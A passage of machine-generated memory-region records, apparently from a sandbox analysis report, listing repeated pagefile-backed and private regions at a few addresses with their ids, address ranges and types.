0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13835 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13836 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13837 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13838 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13839 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13840 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13841 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13842 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13843 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13844 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13845 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13846 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13847 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13848 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13849 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13850 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13851 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13852 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13853 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13854 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13855 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13856 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13857 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13858 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13859 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13860 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13861 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13862 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13863 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13864 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13865 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13866 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13867 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13868 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13869 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13870 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13871 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13872 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13873 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13874 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13875 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13876 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13877 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13878 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13879 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13880 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13881 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13882 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13883 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13884 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13885 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13886 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13887 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13888 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13889 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13890 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13891 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13892 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13893 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13894 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13895 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13896 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13897 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 13898 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 13899 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13900 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13901 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 13902 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 13903 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13904 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13905 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13906 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 13907 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 13908 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13909 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13910 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13911 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13912 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13913 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13914 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13915 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13916 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13917 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13918 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13919 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13920 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13921 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13922 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13923 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13924 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13925 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13926 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13927 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13928 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13929 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13930 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13931 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13932 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13933 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13934 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13935 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13936 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13937 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13938 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13939 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13940 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13941 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13942 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13943 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13944 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13945 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13946 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13947 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13948 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13949 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13950 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13951 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13952 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13953 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13954 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13955 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13956 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13957 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13958 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13959 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13960 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13961 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13962 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13963 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13964 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13965 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13966 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13967 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13968 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13969 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13970 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13971 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13972 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13973 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13974 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13975 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13976 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13977 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 13978 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 13979 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13980 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13981 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13982 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13983 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13984 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13985 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13986 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13987 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13988 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13989 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13990 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13991 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13992 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13993 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13994 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13995 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13996 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13997 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13998 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13999 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14000 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14001 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14002 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14003 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14004 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14005 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14006 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14007 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14008 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14009 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14010 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14011 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14012 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14013 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14014 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14015 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 14016 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 14017 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14018 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14019 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 14020 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 14021 start_va = 0x530000 end_va = 